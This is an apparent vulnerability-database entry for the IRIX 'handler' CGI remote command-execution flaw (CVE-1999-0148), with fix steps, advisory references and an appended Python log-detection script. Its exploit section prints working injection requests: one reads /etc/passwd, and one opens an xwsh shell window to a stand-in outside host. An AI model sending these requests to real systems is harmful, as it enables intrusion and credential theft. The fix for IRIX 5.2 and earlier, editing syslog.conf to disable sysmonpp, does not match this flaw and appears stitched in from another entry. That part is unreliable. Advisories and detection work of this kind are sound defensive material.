Handler Check

Vulnerability Description

Brief description: IRIX handler CGI allows remote command execution

Full description: The handler cgi-bin program contains a vulnerability that allows a remote attacker to execute arbitrary commands on a web server. The handler program is part of the Outbox Environment Subsystem for IRIX, installed by default on all SGI systems running IRIX 6.2 or newer. Older versions of IRIX may have this package optionally installed.

Components: Common Gateway Interface (CGI)

Systems: IRIX 5.3, IRIX 6.0, IRIX 6.0.1, IRIX 6.1, IRIX 6.2, IRIX 6.3, IRIX 6.4

Effect(s) of exploiting: The remote user can execute commands with the privileges of the web server.

Detecting the hole:

    1. See if you are running an unpatched handler on one of the systems listed above. If so, you are vulnerable.

Fixing the hole:

    For IRIX 5.3 and later:
    1. Disable the scripts included with the IRIX Outbox Environment Subsystem and obtain the patch(es) made available by SGI.
    2. Log in as root on the vulnerable machine.
    3. Assuming the default installation path of /var/www, type:
      # /bin/chmod 400 /var/www/cgi-bin/handler
    4. Now delete the outbox system:
      # /usr/sbin/versions -v remove outbox
    5. Install the patch for your system, or upgrade.

    For IRIX 5.2 and earlier, either upgrade or disable the service. The following disables the service:
    1. Log in as root on the vulnerable machine.
    2. Edit the file /etc/syslog.conf. Change the line
      *.crit                  |/var/adm/sysmonpp      /var/adm/SYSLOG
      to
      #*.crit                  |/var/adm/sysmonpp      /var/adm/SYSLOG
      The leading # prevents syslogd(8) from honoring the line (and the sysmonpp(8) program).
    3. Force syslogd to re-read the configuration file:
      # /etc/killall -HUP syslogd

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0148 -- The handler CGI program in IRIX allows arbitrary command execution.

Exploit Information

Attack: Connect to the web server on the target system and enter either of the following (where <TAB> is a tab character):

GET<TAB>/cgi-bin/handler/whatever;cat<TAB>/etc/passwd|<TAB>?data=Download HTTP/1.0
	
or
GET<TAB>/cgi-bin/handler/blah;/usr/sbin/xwsh<TAB>-display<TAB>yourhost.com|?data=Download
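
The requests shown in the Attack field put shell metacharacters (;, | and tab) in the path after /cgi-bin/handler, which gives defenders a log signature to search for. The following detection sketch is an added example, not part of the original entry; it assumes Common Log Format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# First quoted field of a Common Log Format line is the request line.
REQUEST_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Handler CGI path as given on this page (default install under cgi-bin).
HANDLER_RE = re.compile(r"^/cgi-bin/handler(?=[/;?]|$)")
PROTO_RE = re.compile(r"\s+HTTP/\d\.\d$")
# Characters a shell treats specially; none belong in a handler path.
SHELL_META = set(";|`&$<>\t\n")

def suspicious_handler_request(log_line):
    """True if the line logs a handler request whose path has shell metacharacters."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    # Undo log escaping (\t) and percent-encoding so the check sees real characters.
    request = unquote(m.group(1).replace("\\t", "\t"))
    parts = request.split(None, 1)  # method, then everything after it
    if len(parts) < 2:
        return False
    target = PROTO_RE.sub("", parts[1])
    if not HANDLER_RE.match(target):
        return False
    path = target.split("?", 1)[0]
    return any(ch in SHELL_META for ch in path)

def flagged(lines):
    """Return the log lines that match the handler signature."""
    return [ln for ln in lines if suspicious_handler_request(ln)]

# Constructed sample log lines (not from a real server); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/handler/docs/readme.txt?data=Download HTTP/1.0" 200 512',
    # Request line logged with raw tab characters.
    '192.0.2.77 - - [01/Jan/2000:10:00:05 +0000] "GET\t/cgi-bin/handler/whatever;cat\t/etc/passwd|\t?data=Download HTTP/1.0" 200 1024',
    # Same request as written by a server that escapes tabs as \t in its log.
    '192.0.2.77 - - [01/Jan/2000:10:00:09 +0000] "GET\\t/cgi-bin/handler/whatever;cat\\t/etc/passwd|\\t?data=Download HTTP/1.0" 200 1024',
    '192.0.2.10 - - [01/Jan/2000:10:00:12 +0000] "GET /index.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for line in flagged(SAMPLE_LOG):
        print("ALERT:", line)
```

A hit in the logs of a host that still has an executable handler under cgi-bin warrants treating the web server account as compromised, since the entry states commands run with the web server's privileges.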
	

Related Information

SGI has patches for IRIX 5.3, IRIX 6.2, IRIX 6.3, IRIX 6.4.

Advisories: Silicon Graphics Inc. Security Advisory 19970501-02-PX, IRIX webdist.cgi, handler and wrap programs; ISS X-Force database entry http-sgi-handler; Security Focus database entry 380

Related Vulnerabilities:

Reportage

Reporting: Razvan Dragomirescu in Bugtraq (June 16, 1997)

Revision Number 1

  1. Stacey Anderson (Sunday, July 2, 2000):
    Initial entry